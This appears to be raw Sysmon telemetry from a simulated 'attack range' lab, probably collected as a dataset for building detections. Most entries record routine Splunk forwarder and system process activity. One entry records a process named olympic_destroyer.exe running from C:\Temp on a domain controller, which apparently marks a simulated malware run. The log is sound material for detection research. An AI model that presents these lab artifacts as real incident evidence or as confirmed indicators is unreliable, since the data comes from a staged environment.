11:15:44.955{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221176Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.955{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1760-6216-0905-000000003902}784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221175Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.955{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1760-6216-0905-000000003902}784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221174Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.956{4F8D34B0-1760-6216-0905-000000003902}784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000221173Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.299{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1760-6216-0805-000000003902}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221172Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.299{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221171Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.299{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221170Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.299{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221169Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.299{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221168Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.299{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221167Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.299{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221166Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.299{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221165Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.299{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221164Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.299{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1760-6216-0805-000000003902}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221163Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.299{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221162Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.299{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1760-6216-0805-000000003902}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221161Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.300{4F8D34B0-1760-6216-0805-000000003902}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221160Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.283{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=186EF3DF4B919366F0C6A8FD6FC42347,SHA256=BBA7F7ECBDC850573D4ED6A2BB4C3473D8107F3CF174D63C568CEB617427FE17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:45.790{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=627A82EA9AB0F2956FC27A63387B89AF,SHA256=8E70FC3A59882A5FBF3FD3864EBC280A208D3D6424552443470D84C83A763BBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221191Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:45.440{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B363618316026EC207E12E708A97CCA,SHA256=9A5AD548A422B93AAB1B0279929412D41E0372561682FC0818441D891E8537FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221190Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:45.361{4F8D34B0-1760-6216-0905-000000003902}7841300C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000221189Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:45.299{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22BEAB3D22B736073FA923E3F868EEBA,SHA256=BAD0548D6F9ECCE8DA882B9BB1371EC7E546A09B03608C03C856F279A92D3393,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221188Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:45.299{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FEDC7EB2425C5E8D799C3A058955DD18,SHA256=7CCF8E13A04193F9B93CECD54A5EC33C965273E1B24A455F7739B864EFCFF350,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221187Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:42.656{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51634-false10.0.1.12-8000- 10341000x8000000000000000297321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:46.974{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:46.809{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDBC4BF650852CC4509BBDFB564EB213,SHA256=C909C67E47AA4BEFD317B1FACF417E19026A13CF80A6FB157CEDAC0736EFC5DA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221206Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:46.861{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1762-6216-0A05-000000003902}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221205Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221204Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221203Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:46.861{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221202Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 